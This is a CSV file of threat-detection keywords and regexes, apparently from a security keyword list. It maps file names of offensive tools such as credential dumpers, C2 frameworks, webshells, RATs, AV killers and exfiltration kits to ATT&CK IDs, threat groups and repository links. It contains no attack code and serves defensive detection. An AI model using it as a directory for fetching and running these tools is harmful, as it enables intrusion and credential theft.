"*\Backdoor.exe*",".{0,1000}\\Backdoor\.exe.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","14192"
"*\Backdoor.PHP.Agent.php*",".{0,1000}\\Backdoor\.PHP\.Agent\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14193"
"*\backdoor\backdoor.mk*",".{0,1000}\\backdoor\\backdoor\.mk.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14194"
"*\backdoor\backdoor.project*",".{0,1000}\\backdoor\\backdoor\.project.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14195"
"*\backdoor_new.bat*",".{0,1000}\\backdoor_new\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","14196"
"*\backdoored\*",".{0,1000}\\backdoored\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","14197"
"*\backdoored-script.ps1*",".{0,1000}\\backdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","14198"
"*\BackgroundShell.exe*",".{0,1000}\\BackgroundShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14199"
"*\backhack.py*",".{0,1000}\\backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","14200"
"*\Backstab.sln*",".{0,1000}\\Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","14201"
"*\Backstab64.exe*",".{0,1000}\\Backstab64\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","14202"
"*\BackupCreds.csproj*",".{0,1000}\\BackupCreds\.csproj.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14203"
"*\backupcreds.exe*",".{0,1000}\\backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14204"
"*\backupcreds.sln*",".{0,1000}\\backupcreds\.sln.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14205"
"*\backupcreds\Program.cs*",".{0,1000}\\backupcreds\\Program\.cs.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14206"
"*\BackupCreds-main*",".{0,1000}\\BackupCreds\-main.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","14207"
"*\BackupOperatorToDA*",".{0,1000}\\BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","14208"
"*\badger_x64.dll*",".{0,1000}\\badger_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14211"
"*\badger_x64_stealth_ret.bin*",".{0,1000}\\badger_x64_stealth_ret\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14212"
"*\badger_x64_stealth_rtl.bin*",".{0,1000}\\badger_x64_stealth_rtl\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14213"
"*\badger_x64_stealth_wait.bin*",".{0,1000}\\badger_x64_stealth_wait\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14214"
"*\badger_x86.dll*",".{0,1000}\\badger_x86\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14215"
"*\BadPotato.csproj*",".{0,1000}\\BadPotato\.csproj.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","14216"
"*\BadPotato.dll*",".{0,1000}\\BadPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","14217"
"*\BadPotato.exe*",".{0,1000}\\BadPotato\.exe.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","14218"
"*\BadRat 1.6\client.exe*",".{0,1000}\\BadRat\s1\.6\\client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14219"
"*\badrat.ps1*",".{0,1000}\\badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14220"
"*\badrat_cs.exe*",".{0,1000}\\badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14221"
"*\badrat_server.py*",".{0,1000}\\badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14222"
"*\BadRentdrv2.cpp*",".{0,1000}\\BadRentdrv2\.cpp.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","14223"
"*\BadWindowsService.cs*",".{0,1000}\\BadWindowsService\.cs.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14224"
"*\BadWindowsService.exe*",".{0,1000}\\BadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14225"
"*\BadWindowsService.sln*",".{0,1000}\\BadWindowsService\.sln.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14226"
"*\BadZure*",".{0,1000}\\BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","14227"
"*\barnofoo\pipe\spoolss*",".{0,1000}\\barnofoo\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#namedpipe","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","14228"
"*\Barrel.exe debugproc*",".{0,1000}\\Barrel\.exe\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","14229"
"*\Base64ToBin.py*",".{0,1000}\\Base64ToBin\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","14230"
"*\basicKitten.exe*",".{0,1000}\\basicKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","14232"
"*\bat_b4tm4n.php*",".{0,1000}\\bat_b4tm4n\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14275"
"*\BB_Readme.txt*",".{0,1000}\\BB_Readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14279"
"*\BB_Readme2.txt*",".{0,1000}\\BB_Readme2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14280"
"*\beacon.exe*",".{0,1000}\\beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","14281"
"*\BeaconChannel.cs*",".{0,1000}\\BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","14282"
"*\BeaconConnector.cs*",".{0,1000}\\BeaconConnector\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","14283"
"*\beacon-in-go.exe*",".{0,1000}\\beacon\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","14284"
"*\beacon-obf.exe*",".{0,1000}\\beacon\-obf\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14285"
"*\beRoot.exe*",".{0,1000}\\beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14287"
"*\beRoot.zip*",".{0,1000}\\BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14288"
"*\beroot\modules\*.py*",".{0,1000}\\beroot\\modules\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14289"
"*\BesoToken.cpp*",".{0,1000}\\BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14290"
"*\BesoToken.exe*",".{0,1000}\\BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14291"
"*\BesoToken.vcxproj*",".{0,1000}\\BesoToken\.vcxproj.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14292"
"*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14294"
"*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14295"
"*\bgp_exfil.py*",".{0,1000}\\bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","14296"
"*\bh_owned.py*",".{0,1000}\\bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14297"
"*\BHF Rat v * beta.exe*",".{0,1000}\\BHF\sRat\sv\s.{0,1000}\sbeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14298"
"*\bidon_readme.txt*",".{0,1000}\\bidon_readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14299"
"*\Bifrost RAT Of Evil.exe*",".{0,1000}\\Bifrost\sRAT\sOf\sEvil\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14300"
"*\big_shell_pwd.7z*",".{0,1000}\\big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14301"
